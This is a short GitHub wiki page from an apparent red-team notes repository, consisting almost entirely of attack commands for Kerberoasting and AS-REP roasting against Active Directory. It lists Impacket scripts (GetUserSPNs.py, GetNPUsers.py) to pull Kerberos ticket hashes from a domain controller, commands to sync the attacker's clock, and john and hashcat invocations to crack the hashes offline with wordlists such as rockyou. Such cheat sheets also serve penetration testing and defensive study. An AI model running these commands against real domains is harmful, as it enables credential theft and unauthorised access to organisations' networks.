Kerberoasting y ASP‐REP Roasting - miremarti/redteam-stuff GitHub Wiki
./GetUserSPNs.py -request -dc-ip <IP> <dominio>/<usuario>:<contraseña>
sudo su
timedatectl set-ntp off
rdate -n <IP>
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
./GetNPUsers.py <dominio>/ -usersfile /tmp/users.txt -format hashcat -outputfile /tmp/asrep.hashes
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --force